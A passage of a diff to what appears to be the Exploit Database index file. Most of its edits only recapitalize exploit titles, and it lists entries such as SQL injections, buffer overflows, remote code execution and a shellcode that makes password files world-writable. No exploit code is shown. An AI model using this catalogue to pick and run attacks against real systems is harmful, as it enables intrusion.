SQL Injection",2012-07-03,"Daniel Godoy",php,webapps,0 19550,platforms/php/webapps/19550.txt,"phpMyBackupPro 2.2 - Local File Inclusion",2012-07-03,dun,php,webapps,0 @@ -16935,7 +16935,7 @@ id,file,description,date,author,platform,type,port 19569,platforms/windows/dos/19569.pl,"WFTPD 2.34/2.40/3.0 - Remote Buffer Overflow (1)",1999-10-28,"Alberto Soli",windows,dos,0 19570,platforms/windows/remote/19570.txt,"WFTPD 2.34/2.40/3.0 - Remote Buffer Overflow (2)",1999-11-04,"Alberto Solino",windows,remote,0 19571,platforms/multiple/dos/19571.c,"Netscape Messaging Server 3.6/3.54/3.55 - RCPT TO Denial of Service",1999-10-28,"Nobuo Miwa",multiple,dos,0 -19572,platforms/php/webapps/19572.txt,"WordPress MoodThingy Widget 0.8.7 Plugin - Blind SQL Injection",2012-07-04,"Chris Kellum",php,webapps,0 +19572,platforms/php/webapps/19572.txt,"Wordpress MoodThingy Widget 0.8.7 Plugin - Blind SQL Injection",2012-07-04,"Chris Kellum",php,webapps,0 19573,platforms/php/webapps/19573.php,"Tiki Wiki CMS Groupware 8.3 - 'unserialize()' PHP Code Execution",2012-07-04,EgiX,php,webapps,0 19574,platforms/php/webapps/19574.txt,"Webify Link Directory - SQL Injection",2012-07-04,"Daniel Godoy",php,webapps,0 19575,platforms/windows/dos/19575.txt,".NET Framework - Tilde Character Denial of Service",2012-07-04,"Soroush Dalili",windows,dos,0 @@ -17075,7 +17075,7 @@ id,file,description,date,author,platform,type,port 19712,platforms/multiple/remote/19712.txt,"Allaire ColdFusion Server 4.0/4.0.1 - CFCACHE",2000-01-04,anonymous,multiple,remote,0 19713,platforms/cgi/remote/19713.pl,"Solution Scripts Home Free 1.0 - search.cgi Directory Traversal",2000-01-03,"k0ad k1d",cgi,remote,0 40086,platforms/ruby/remote/40086.rb,"Ruby on Rails ActionPack Inline ERB - Code Execution",2016-07-11,Metasploit,ruby,remote,80 -19715,platforms/php/webapps/19715.txt,"WordPress WP-Predict Plugin 1.0 - Blind SQL Injection",2012-07-10,"Chris Kellum",php,webapps,0 +19715,platforms/php/webapps/19715.txt,"Wordpress WP-Predict Plugin 1.0 - Blind SQL Injection",2012-07-10,"Chris Kellum",php,webapps,0 19716,platforms/windows/dos/19716.txt,"Checkpoint Abra - Multiple Vulnerabilities",2012-07-10,"Andrey Komarov",windows,dos,0 19717,platforms/java/remote/19717.rb,"Java Applet - Field Bytecode Verifier Cache Remote Code Execution",2012-07-11,Metasploit,java,remote,0 19718,platforms/windows/remote/19718.rb,"AdminStudio - LaunchHelp.dll ActiveX Arbitrary Code Execution",2012-07-11,Metasploit,windows,remote,0 @@ -17105,7 +17105,7 @@ id,file,description,date,author,platform,type,port 19742,platforms/multiple/remote/19742.txt,"Microsoft iis 3.0/4.0 / Microsoft index server 2.0 - Directory Traversal",2000-02-02,Mnemonix,multiple,remote,0 19743,platforms/windows/remote/19743.txt,"Cat Soft Serv-U 2.5/a/b / Windows 2000/95/98/NT 4.0 - Shortcut",2000-02-04,"Ussr Labs",windows,remote,0 19744,platforms/novell/dos/19744.txt,"Novell Groupwise Enhancement Pack 5.5 Enhancement Pack - Denial of Service",2000-02-07,"Adam Gray",novell,dos,0 -19745,platforms/cgi/remote/19745.txt,"Daniel Beckham The Finger Server 0.82 BETA - Pipe",2000-02-04,"Iain Wade",cgi,remote,0 +19745,platforms/cgi/remote/19745.txt,"Daniel Beckham The Finger Server 0.82 Beta - Pipe",2000-02-04,"Iain Wade",cgi,remote,0 19746,platforms/novell/dos/19746.txt,"Novell BorderManager 3.0/3.5 Audit Trail Proxy - Denial of Service",2000-02-04,"Chicken Man",novell,dos,0 19747,platforms/cgi/remote/19747.txt,"Zeus Web Server 3.x - Null Terminated Strings",2000-02-08,"Vanja Hrustic",cgi,remote,0 19748,platforms/windows/dos/19748.txt,"True North Software Internet Anywhere Mail Server 3.1.3 - RETR Denial of Service",2000-02-10,"Nobuo Miwa",windows,dos,0 @@ -17121,7 +17121,7 @@ id,file,description,date,author,platform,type,port 19758,platforms/php/webapps/19758.rb,"Hastymail 2.1.1 RC1 - Command Injection",2012-07-12,Metasploit,php,webapps,0 19759,platforms/windows/dos/19759.c,"Microsoft Windows Media Services 4.0/4.1 - Handshake Sequence Denial of Service",2000-01-18,"Kit Knox",windows,dos,0 19760,platforms/windows/dos/19760.txt,"Pragma Systems InterAccess TelnetD Server 4.0 - Terminal Configuration",2000-02-24,"Ussr Labs",windows,dos,0 -19761,platforms/windows/remote/19761.txt,"Sambar Server 4.2 beta 7 - Batch CGI",2000-02-24,"Georich Chorbadzhiyski",windows,remote,0 +19761,platforms/windows/remote/19761.txt,"Sambar Server 4.2 Beta 7 - Batch CGI",2000-02-24,"Georich Chorbadzhiyski",windows,remote,0 19762,platforms/linux/local/19762.c,"FTPx FTP Explorer 1.0.00.10 - Weak Password Encryption",2000-02-25,"Nelson Brito",linux,local,0 19763,platforms/linux/local/19763.txt,"RedHat Linux 6.0 - Single User Mode Authentication",2000-02-23,"Darren Reed",linux,local,0 19764,platforms/linux/local/19764.txt,"Corel Linux OS 1.0 - buildxconfig",2000-02-24,suid,linux,local,0 @@ -17138,7 +17138,7 @@ id,file,description,date,author,platform,type,port 19778,platforms/linux/local/19778.c,"RedHat 4.x/5.x/6.x / RedHat man 1.5 / Turbolinux man 1.5 / Turbolinux 3.5/4.x man - Buffer Overrun (1)",2000-02-26,"Babcia Padlina",linux,local,0 19779,platforms/linux/local/19779.c,"RedHat 4.x/5.x/6.x / RedHat man 1.5 / Turbolinux man 1.5 / Turbolinux 3.5/4.x man - Buffer Overrun (2)",2000-02-26,"Babcia Padlina",linux,local,0 19780,platforms/multiple/dos/19780.txt,"Trend Micro OfficeScan Corporate Edition 3.0/3.5/3.11/3.13 - Denial of Service",2000-02-26,"Jeff Stevens",multiple,dos,0 -19781,platforms/multiple/remote/19781.sh,"Alex Heiphetz Group EZShopper 3.0 - Remote Command Execution",2000-02-27,suid,multiple,remote,0 +19781,platforms/multiple/remote/19781.sh,"Alex Heiphetz Group eZshopper 3.0 - Remote Command Execution",2000-02-27,suid,multiple,remote,0 19782,platforms/windows/dos/19782.pl,"HP OpenView OmniBack II 2.55/3.0/3.1 - Denial of Service",2000-02-28,"Jon Hittner",windows,dos,0 19783,platforms/windows/dos/19783.txt,"Netscape Enterprise Server 3.6 SP2/FastTrack Server 2.0.1 - GET Request",1999-08-25,"ISS X-Force",windows,dos,0 19784,platforms/multiple/remote/19784.txt,"Axis Communications StorPoint CD - Bypass Authentication",2000-03-01,"Infosec Swedish based tigerteam",multiple,remote,0 @@ -17148,7 +17148,7 @@ id,file,description,date,author,platform,type,port 19788,platforms/irix/remote/19788.pl,"SGI InfoSearch 1.0 / SGI IRIX 6.5.x - fname",2000-03-05,rpc,irix,remote,0 19789,platforms/windows/local/19789.txt,"Microsoft Clip Art Gallery 5.0 - Buffer Overflow",2000-03-06,dildog,windows,local,0 19790,platforms/php/webapps/19790.txt,"webpagetest 2.6 - Multiple Vulnerabilities",2012-07-13,dun,php,webapps,0 -19791,platforms/php/webapps/19791.txt,"WordPress Resume Submissions & Job Postings 2.5.1 Plugin - Unrestricted File Upload",2012-07-13,"Chris Kellum",php,webapps,0 +19791,platforms/php/webapps/19791.txt,"Wordpress Resume Submissions & Job Postings 2.5.1 Plugin - Unrestricted File Upload",2012-07-13,"Chris Kellum",php,webapps,0 19792,platforms/php/webapps/19792.txt,"Joomla KISS Advertiser - Remote File & Bypass Upload",2012-07-13,D4NB4R,php,webapps,0 19830,platforms/windows/remote/19830.txt,"Microsoft Index Server 2.0 - '%20' ASP Source Disclosure",2000-03-31,"David Litchfield",windows,remote,0 19794,platforms/linux/local/19794.txt,"Oracle8i Standard Edition 8.1.5 for Linux Installer - Exploit",2000-03-05,"Keyser Soze",linux,local,0 @@ -17219,7 +17219,7 @@ id,file,description,date,author,platform,type,port 19904,platforms/unix/local/19904.txt,"Intel Corporation NetStructure 7110 - Undocumented Password",2000-05-08,"Stake Inc",unix,local,0 19859,platforms/hardware/webapps/19859.txt,"Vivotek Cameras - Sensitive Information Disclosure",2012-07-16,GothicX,hardware,webapps,0 19960,platforms/windows/dos/19960.txt,"Oracle Outside-In - .FPX File Parsing Heap Overflow",2012-07-20,"Francis Provencher",windows,dos,0 -19862,platforms/php/webapps/19862.pl,"WordPress Diary/Notebook Site5 Theme - Email Spoofing",2012-07-16,bwall,php,webapps,0 +19862,platforms/php/webapps/19862.pl,"Wordpress Diary/Notebook Site5 Theme - Email Spoofing",2012-07-16,bwall,php,webapps,0 19863,platforms/php/webapps/19863.txt,"CakePHP 2.x-2.2.0-RC2 - XXE Injection",2012-07-16,"Pawel Wylecial",php,webapps,0 19864,platforms/php/webapps/19864.txt,"VamCart 0.9 CMS - Multiple Vulnerabilities",2012-07-16,Vulnerability-Lab,php,webapps,0 19865,platforms/php/webapps/19865.txt,"PBBoard 2.1.4 CMS - Multiple Vulnerabilities",2012-07-16,Vulnerability-Lab,php,webapps,0 @@ -17243,9 +17243,9 @@ id,file,description,date,author,platform,type,port 19883,platforms/linux/local/19883.c,"S.u.S.E. Linux 6.3/6.4 Gnomelib - Buffer Overflow",2000-04-29,bladi,linux,local,0 19884,platforms/windows/dos/19884.txt,"Atrium Software Cassandra NNTP Server 1.10 - Buffer Overflow",2000-05-01,"Ussr Labs",windows,dos,0 19885,platforms/windows/dos/19885.txt,"Qualcomm Eudora 4.2/4.3 - Warning Message Circumvention",2000-04-28,"Bennett Haselton",windows,dos,0 -19886,platforms/multiple/remote/19886.c,"Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 beta - Mail Logging Buffer Overflow (1)",2000-05-02,FuSyS,multiple,remote,0 -19887,platforms/multiple/remote/19887.c,"Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 beta - Mail Logging Buffer Overflow (2)",2000-05-02,MaXX,multiple,remote,0 -19888,platforms/multiple/remote/19888.c,"Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 beta - Mail Logging Buffer Overflow (3)",2002-01-18,g463,multiple,remote,0 +19886,platforms/multiple/remote/19886.c,"Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 Beta - Mail Logging Buffer Overflow (1)",2000-05-02,FuSyS,multiple,remote,0 +19887,platforms/multiple/remote/19887.c,"Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 Beta - Mail Logging Buffer Overflow (2)",2000-05-02,MaXX,multiple,remote,0 +19888,platforms/multiple/remote/19888.c,"Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 Beta - Mail Logging Buffer Overflow (3)",2002-01-18,g463,multiple,remote,0 19890,platforms/cgi/remote/19890.txt,"ultrascripts ultraboard 1.6 - Directory Traversal",2000-05-03,"Rudi Carell",cgi,remote,0 19891,platforms/linux/remote/19891.c,"Ethereal 0.8.4/0.8.5/0.8.6 / tcpdump 3.4/3.5 alpha - DNS Decode (1)",1999-05-31,"Hugo Breton",linux,remote,0 19892,platforms/linux/remote/19892.txt,"Ethereal 0.8.4/0.8.5/0.8.6 / tcpdump 3.4/3.5 alpha - DNS Decode (2)",1999-05-31,scut,linux,remote,0 @@ -17426,7 +17426,7 @@ id,file,description,date,author,platform,type,port 20080,platforms/windows/dos/20080.c,"Computer Software Manufaktur Alibaba 2.0 - Denial of Service",2000-07-18,wildcoyote,windows,dos,0 20081,platforms/windows/local/20081.c,"NetZero ZeroPort 3.0 - Weak Encryption Method",2000-07-18,"Brian Carrier",windows,local,0 20082,platforms/unix/remote/20082.txt,"University of Washington pop2d 4.46/4.51/4.54/4.55 - Remote File Read",2000-07-14,mandark,unix,remote,0 -20083,platforms/php/webapps/20083.txt,"WordPress Front End Upload 0.5.4.4 Plugin - Arbitrary PHP File Upload",2012-07-24,"Chris Kellum",php,webapps,0 +20083,platforms/php/webapps/20083.txt,"Wordpress Front End Upload 0.5.4.4 Plugin - Arbitrary PHP File Upload",2012-07-24,"Chris Kellum",php,webapps,0 20085,platforms/cgi/remote/20085.txt,"Computer Software Manufaktur Alibaba 2.0 - Piped Command",2000-07-18,Prizm,cgi,remote,0 20086,platforms/windows/remote/20086.c,"OReilly Software WebSite Professional 2.3.18/2.4/2.4.9 - 'webfind.exe' Buffer Overflow",2000-06-01,"Robert Horton",windows,remote,0 20087,platforms/php/webapps/20087.py,"Zabbix 2.0.1 - Session Extractor",2012-07-24,muts,php,webapps,0 @@ -17475,14 +17475,14 @@ id,file,description,date,author,platform,type,port 20138,platforms/irix/local/20138.c,"IRIX 5.3/6.x - mail",1997-09-01,"Last Stage of Delirium",irix,local,0 20139,platforms/multiple/remote/20139.txt,"Sun JDK 1.1.x / Sun JRE 1.1.x - Listening Socket",2000-08-03,"Alexey Yarovinsky",multiple,remote,0 20140,platforms/multiple/remote/20140.txt,"Netscape Communicator 4.x - URL Read",2000-08-03,"Dan Brumleve",multiple,remote,0 -20141,platforms/linux/local/20141.pl,"Suidperl 5.00503 - Mail Shell Escape (1)",2000-08-07,"Sebastian Krahmer",linux,local,0 -20142,platforms/linux/local/20142.sh,"Suidperl 5.00503 - Mail Shell Escape (2)",2000-08-07,"Michal Zalewski",linux,local,0 +20141,platforms/linux/local/20141.pl,"SUIDPerl 5.00503 - Mail Shell Escape (1)",2000-08-07,"Sebastian Krahmer",linux,local,0 +20142,platforms/linux/local/20142.sh,"SUIDPerl 5.00503 - Mail Shell Escape (2)",2000-08-07,"Michal Zalewski",linux,local,0 20143,platforms/linux/remote/20143.txt,"Luca Deri ntop 1.2 a7-9 - Unauthorized File Retrieval",2000-08-02,dubhe,linux,remote,0 20144,platforms/solaris/remote/20144.txt,"Sun AnswerBook2 1.4.2/1.4.3/1.4.4 - Administration Interface Access",2000-08-08,"Lluis Mora",solaris,remote,0 20146,platforms/solaris/remote/20146.txt,"Solaris AnswerBook2 - Remote Command Execution",2000-08-07,"Lluis Mora",solaris,remote,0 20147,platforms/solaris/local/20147.sh,"Tech-Source Raptor GFX PGX32 2.3.1 - Config Tool",2000-08-02,suid,solaris,local,0 20148,platforms/windows/remote/20148.pl,"MediaHouse Software Statistics Server LiveStats 5.2 - Buffer Overflow",2000-08-10,Zan,windows,remote,0 -20149,platforms/irix/remote/20149.c,"IRIX 5.2/5.3/6.x - telnetd Environment Variable Format String",2000-07-01,"Last Stage of Delirium",irix,remote,0 +20149,platforms/irix/remote/20149.c,"IRIX 5.2/5.3/6.x - TelnetD Environment Variable Format String",2000-07-01,"Last Stage of Delirium",irix,remote,0 20150,platforms/unix/remote/20150.c,"Luca Deri ntop 1.2 a7-9/1.3.1 - Buffer Overflow",2000-08-14,anonymous,unix,remote,0 20151,platforms/windows/remote/20151.pl,"Microsoft IIS 5.0 - 'Translate: f' Source Disclosure (1)",2000-08-14,smiler,windows,remote,0 20152,platforms/windows/remote/20152.pl,"Microsoft IIS 5.0 - 'Translate: f' Source Disclosure (2)",2000-08-14,"Roelof Temmingh",windows,remote,0 @@ -17527,7 +17527,7 @@ id,file,description,date,author,platform,type,port 20192,platforms/unix/dos/20192.txt,"LPPlus 3.2.2/3.3 - Permissions Denial of Service",2000-09-06,"Dixie Flatline",unix,dos,0 20193,platforms/unix/local/20193.txt,"LPPlus 3.2.2/3.3 - dccscan unprivileged read",2000-09-06,"Dixie Flatline",unix,local,0 20194,platforms/cgi/remote/20194.pl,"CGI Script Center Auction Weaver 1.0.2 - Remote Command Execution",2000-08-30,teleh0r,cgi,remote,0 -20196,platforms/lin_x86/shellcode/20196.c,"Linux/x86 - chmod 666 /etc/passwd & /etc/shadow shellcode (57 bytes)",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode,0 +20196,platforms/lin_x86/shellcode/20196.c,"Linux/x86 - chmod 666 /etc/passwd & /etc/shadow Shellcode (57 bytes)",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode,0 20197,platforms/php/webapps/20197.txt,"joomla joomgalaxy 1.2.0.4 - Multiple Vulnerabilities",2012-08-02,D4NB4R,php,webapps,0 20198,platforms/php/webapps/20198.txt,"am4ss 1.2 - Multiple Vulnerabilities",2012-08-02,s3n4t00r,php,webapps,0 20199,platforms/php/webapps/20199.php,"am4ss Support System 1.2 - PHP Code Injection Exploit",2012-08-02,i-Hmx,php,webapps,0 @@ -17554,7 +17554,7 @@ id,file,description,date,author,platform,type,port 20220,platforms/linux/remote/20220.txt,"Mandrake 6.1/7.0/7.1 - /perl http Directory Disclosure",2000-09-11,anonymous,linux,remote,0 20221,platforms/windows/dos/20221.pl,"Jack De Winter WinSMTP 1.6 f/2.0 - Buffer Overflow",2000-09-11,"Guido Bakker",windows,dos,0 20222,platforms/windows/remote/20222.cpp,"Microsoft Windows 2000 - telnet.exe NTLM Authentication",2000-08-14,@stake,windows,remote,0 -20223,platforms/windows/remote/20223.txt,"Sambar Server 4.3/4.4 beta 3 - Search CGI",2000-09-15,dethy,windows,remote,0 +20223,platforms/windows/remote/20223.txt,"Sambar Server 4.3/4.4 Beta 3 - Search CGI",2000-09-15,dethy,windows,remote,0 20224,platforms/windows/remote/20224.txt,"CamShot WebCam 2.6 Trial - Remote Buffer Overflow",2000-09-15,SecuriTeam,windows,remote,0 20225,platforms/windows/dos/20225.pl,"Alt-N MDaemon 3.1.1 - Denial of Service",1999-12-01,"Ussr Labs",windows,dos,0 20226,platforms/freebsd/dos/20226.c,"FreeBSD Kernel - SCTP Remote NULL Ptr Dereference Denial of Service",2012-08-03,"Shaun Colley",freebsd,dos,0 @@ -17601,7 +17601,7 @@ id,file,description,date,author,platform,type,port 20298,platforms/windows/remote/20298.c,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (1)",2000-10-17,"Gabriel Maggiotti",windows,remote,0 20268,platforms/php/webapps/20268.txt,"Tickets CAD 2.20G - Multiple Vulnerabilities",2012-08-05,chap0,php,webapps,0 20269,platforms/windows/remote/20269.txt,"Microsoft IIS 5.0 - Indexed Directory Disclosure",2000-10-04,"David Litchfield",windows,remote,0 -20270,platforms/php/webapps/20270.txt,"WordPress Plugin Effective Lead Management 3.0.0 - Persistent Cross-Site Scripting",2012-08-05,"Chris Kellum",php,webapps,0 +20270,platforms/php/webapps/20270.txt,"Wordpress Plugin Effective Lead Management 3.0.0 - Persistent Cross-Site Scripting",2012-08-05,"Chris Kellum",php,webapps,0 20271,platforms/openbsd/dos/20271.c,"OpenBSD 2.x - Pending ARP Request Remote Denial of Service",2000-10-05,skyper,openbsd,dos,0 20272,platforms/windows/dos/20272.pl,"Apache 1.2.5/1.3.1 & UnityMail 2.0 - MIME Header Denial of Service",1998-08-02,L.Facq,windows,dos,0 20273,platforms/cgi/remote/20273.txt,"Moreover CGI script - File Disclosure",2000-10-02,CDI,cgi,remote,0 @@ -17660,15 +17660,15 @@ id,file,description,date,author,platform,type,port 20330,platforms/hardware/remote/20330.pl,"Cisco Catalyst 3500 XL - Arbitrary Command Execution",2000-10-26,blackangels,hardware,remote,0 20331,platforms/hardware/dos/20331.c,"Ascend R 4.5 Ci12 - Denial of Service (1)",1998-03-16,Rootshell,hardware,dos,0 20332,platforms/hardware/dos/20332.pl,"Ascend R 4.5 Ci12 - Denial of Service (2)",1998-03-17,Rootshell,hardware,dos,0 -20333,platforms/unix/local/20333.c,"Exim Buffer 1.6.2/1.6.51 - Overflow",1997-07-21,"D. J. Bernstein",unix,local,0 +20333,platforms/unix/local/20333.c,"Exim Buffer 1.6.2/1.6.51 - Overflow Exploit",1997-07-21,"D. J. Bernstein",unix,local,0 20334,platforms/windows/remote/20334.java,"CatSoft FTP Serv-U 2.5.x - Brute-Force",2000-10-29,Craig,windows,remote,0 20335,platforms/windows/remote/20335.txt,"Microsoft Indexing Services for Windows 2000/NT 4.0 - (.htw) Cross-Site Scripting",2000-10-28,"Georgi Guninski",windows,remote,0 20336,platforms/multiple/dos/20336.txt,"Unify eWave ServletExec 3.0 c - Denial of Service",2000-10-30,"Foundstone Labs",multiple,dos,0 20337,platforms/unix/remote/20337.c,"tcpdump 3.4/3.5 - AFS ACL Packet Buffer Overflow",2001-01-02,Zhodiac,unix,remote,0 -20338,platforms/linux/local/20338.c,"SAMBA 2.0.7 - SWAT Symlink (1)",2000-11-01,Optyx,linux,local,0 -20339,platforms/linux/local/20339.sh,"SAMBA 2.0.7 - SWAT Symlink (2)",2000-11-01,Optyx,linux,local,0 -20340,platforms/unix/remote/20340.c,"SAMBA 2.0.7 SWAT - Logging Failure",2000-11-01,dodeca-T,unix,remote,0 -20341,platforms/linux/local/20341.sh,"SAMBA 2.0.7 SWAT - Logfile Permissions",2000-11-01,miah,linux,local,0 +20338,platforms/linux/local/20338.c,"Samba 2.0.7 - SWAT Symlink (1)",2000-11-01,Optyx,linux,local,0 +20339,platforms/linux/local/20339.sh,"Samba 2.0.7 - SWAT Symlink (2)",2000-11-01,Optyx,linux,local,0 +20340,platforms/unix/remote/20340.c,"Samba 2.0.7 SWAT - Logging Failure",2000-11-01,dodeca-T,unix,remote,0 +20341,platforms/linux/local/20341.sh,"Samba 2.0.7 SWAT - Logfile Permissions",2000-11-01,miah,linux,local,0 20342,platforms/php/webapps/20342.php,"WespaJuris 3.0 - Multiple Vulnerabilities",2012-08-08,WhiteCollarGroup,php,webapps,0 20343,platforms/php/webapps/20343.pl,"Joomla En Masse Component 1.2.0.4 - SQL Injection",2012-08-08,D4NB4R,php,webapps,0 20344,platforms/php/webapps/20344.php,"AraDown - Blind SQL Injection",2012-08-08,G-B,php,webapps,0 @@ -17679,20 +17679,20 @@ id,file,description,date,author,platform,type,port 20349,platforms/windows/webapps/20349.py,"emailarchitect enterprise email server 10.0 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0 20350,platforms/windows/webapps/20350.py,"escon supportportal pro 3.0 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0 20351,platforms/windows/webapps/20351.py,"mailenable enterprise 6.5 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0 -20352,platforms/windows/webapps/20352.py,"afterlogic mailsuite pro (vmware appliance) 6.3 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0 +20352,platforms/windows/webapps/20352.py,"afterlogic mailsuite pro (VMware appliance) 6.3 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0 20353,platforms/windows/webapps/20353.py,"mailtraq 2.17.3.3150 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0 20354,platforms/php/remote/20354.rb,"PHP IRC Bot pbot - eval() Remote Code Execution",2012-08-08,Metasploit,php,remote,0 20355,platforms/windows/remote/20355.rb,"Plixer Scrutinizer NetFlow and sFlow Analyzer 9 - Default MySQL Credential",2012-08-08,Metasploit,windows,remote,0 20356,platforms/windows/webapps/20356.py,"ManageEngine ServiceDesk Plus 8.1 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0 20357,platforms/windows/webapps/20357.py,"alt-n mdaemon free 12.5.4 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0 -20358,platforms/php/webapps/20358.py,"WordPress mini mail dashboard widget 1.42 Plugin - Persistent Cross-Site Scripting",2012-08-08,loneferret,php,webapps,0 +20358,platforms/php/webapps/20358.py,"Wordpress mini mail dashboard widget 1.42 Plugin - Persistent Cross-Site Scripting",2012-08-08,loneferret,php,webapps,0 20359,platforms/windows/webapps/20359.py,"OTRS Open Technology Real Services 3.1.4 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0 -20360,platforms/php/webapps/20360.py,"WordPress Plugin postie 1.4.3 - Persistent Cross-Site Scripting",2012-08-08,loneferret,php,webapps,0 -20361,platforms/php/webapps/20361.py,"WordPress Plugin simplemail 1.0.6 - Persistent Cross-Site Scripting",2012-08-08,loneferret,php,webapps,0 +20360,platforms/php/webapps/20360.py,"Wordpress Plugin postie 1.4.3 - Persistent Cross-Site Scripting",2012-08-08,loneferret,php,webapps,0 +20361,platforms/php/webapps/20361.py,"Wordpress Plugin simplemail 1.0.6 - Persistent Cross-Site Scripting",2012-08-08,loneferret,php,webapps,0 20362,platforms/windows/webapps/20362.py,"smartermail free 9.2 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0 20363,platforms/windows/webapps/20363.py,"surgemail 6.0a4 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0 20364,platforms/php/webapps/20364.py,"T-dah Webmail Client 3.2.0-2.3 - Persistent Cross-Site Scripting",2012-08-08,loneferret,php,webapps,0 -20365,platforms/php/webapps/20365.py,"WordPress Plugin ThreeWP Email Reflector 1.13 - Persistent Cross-Site Scripting",2012-08-08,loneferret,php,webapps,0 +20365,platforms/php/webapps/20365.py,"Wordpress Plugin ThreeWP Email Reflector 1.13 - Persistent Cross-Site Scripting",2012-08-08,loneferret,php,webapps,0 20366,platforms/windows/webapps/20366.py,"winwebmail server 3.8.1.6 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0 20367,platforms/windows/webapps/20367.py,"xeams email server 4.4 build 5720 - Persistent Cross-Site Scripting",2012-08-08,loneferret,windows,webapps,0 20368,platforms/windows/webapps/20368.py,"IBM Proventia Network Mail Security System 2.5 - POST File Read",2012-08-08,muts,windows,webapps,0 @@ -17743,7 +17743,7 @@ id,file,description,date,author,platform,type,port 20413,platforms/unix/remote/20413.txt,"BB4 Big Brother Network Monitor 1.5 d2 - bb-hist.sh HISTFILE Parameter File Existence Disclosure",2000-11-20,"f8 Research Labs",unix,remote,0 20414,platforms/unix/remote/20414.c,"Ethereal - AFS Buffer Overflow",2000-11-18,mat,unix,remote,0 20424,platforms/windows/remote/20424.txt,"Microsoft Windows Media Player 7.0 - (.wms) Arbitrary Script",2000-11-22,"Sandro Gauci",windows,remote,0 -20416,platforms/php/webapps/20416.txt,"WordPress Mz-jajak plugin 2.1 - SQL Injection",2012-08-10,StRoNiX,php,webapps,0 +20416,platforms/php/webapps/20416.txt,"Wordpress Mz-jajak plugin 2.1 - SQL Injection",2012-08-10,StRoNiX,php,webapps,0 20417,platforms/osx/local/20417.c,"Tunnelblick - Privilege Escalation (1)",2012-08-11,zx2c4,osx,local,0 20418,platforms/solaris/local/20418.txt,"Solaris 10 Patch 137097-01 - Symlink Attack Privilege Escalation",2012-08-11,"Larry Cashdollar",solaris,local,0 20419,platforms/php/webapps/20419.txt,"Flynax General Classifieds 4.0 CMS - Multiple Vulnerabilities",2012-08-11,Vulnerability-Lab,php,webapps,0 @@ -17761,7 +17761,7 @@ id,file,description,date,author,platform,type,port 20433,platforms/cgi/remote/20433.txt,"CGI City CC Whois 1.0 - Metacharacter",1999-11-09,"Cody T. - hhp",cgi,remote,0 20434,platforms/cgi/remote/20434.txt,"Miva htmlscript 2.x - Directory Traversal",1998-01-26,"Dennis Moore",cgi,remote,0 20435,platforms/cgi/remote/20435.txt,"Apache 0.8.x/1.0.x & NCSA httpd 1.x - test-cgi Directory Listing",1996-04-01,@stake,cgi,remote,0 -20436,platforms/unix/local/20436.sh,"Mac OS X 10 / HP-UX 9/10/11 / Mandriva 6/7 / RedHat 5/6 / SCO 5 / IRIX 6 - Shell Redirection Race Condition",2000-01-02,proton,unix,local,0 +20436,platforms/unix/local/20436.sh,"Mac OSX 10 / HP-UX 9/10/11 / Mandriva 6/7 / RedHat 5/6 / SCO 5 / IRIX 6 - Shell Redirection Race Condition",2000-01-02,proton,unix,local,0 20437,platforms/windows/dos/20437.c,"Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (1)",1997-07-05,_eci,windows,dos,0 20438,platforms/windows/dos/20438.pl,"Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (2)",1997-05-07,_eci,windows,dos,0 20439,platforms/windows/dos/20439.pl,"Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (3)",1997-05-07,_eci,windows,dos,0 @@ -17771,8 +17771,8 @@ id,file,description,date,author,platform,type,port 20443,platforms/osx/local/20443.sh,"Tunnelblick - Privilege Escalation (2)",2012-08-11,zx2c4,osx,local,0 20444,platforms/cgi/remote/20444.txt,"Greg Matthews - Classifieds.cgi 1.0 Metacharacter",1998-12-15,anonymous,cgi,remote,0 20445,platforms/windows/remote/20445.txt,"IIS 1.0 / Netscape Server 1.0/1.12 / OReilly WebSite Professional 1.1 b - BAT/.CMD Remote Command Execution",1996-03-01,anonymous,windows,remote,0 -20446,platforms/cgi/remote/20446.txt,"WebCom datakommunikation Guestbook 0.1 - wguest.exe Arbitrary File Access",1999-04-09,Mnemonix,cgi,remote,0 -20447,platforms/cgi/remote/20447.txt,"WebCom datakommunikation Guestbook 0.1 - rguest.exe Arbitrary File Access",1999-04-09,Mnemonix,cgi,remote,0 +20446,platforms/cgi/remote/20446.txt,"WebCom datakommunikation GuestBook 0.1 - wguest.exe Arbitrary File Access",1999-04-09,Mnemonix,cgi,remote,0 +20447,platforms/cgi/remote/20447.txt,"WebCom datakommunikation GuestBook 0.1 - rguest.exe Arbitrary File Access",1999-04-09,Mnemonix,cgi,remote,0 20448,platforms/cgi/remote/20448.txt,"Novell NetWare Web Server 2.x - convert.bas",1996-07-03,"TTT Group",cgi,remote,0 20449,platforms/unix/remote/20449.txt,"GlimpseHTTP 1.0/2.0 / WebGlimpse 1.0 - Piped Command",1996-07-03,"Razvan Dragomirescu",unix,remote,0 20450,platforms/multiple/remote/20450.txt,"Trlinux Postaci Webmail 1.1.3 - Password Disclosure",2000-11-30,"Michael R. Rudel",multiple,remote,0 @@ -17799,7 +17799,7 @@ id,file,description,date,author,platform,type,port 21316,platforms/php/webapps/21316.txt,"ASTPP VoIP Billing (4cf207a) - Multiple 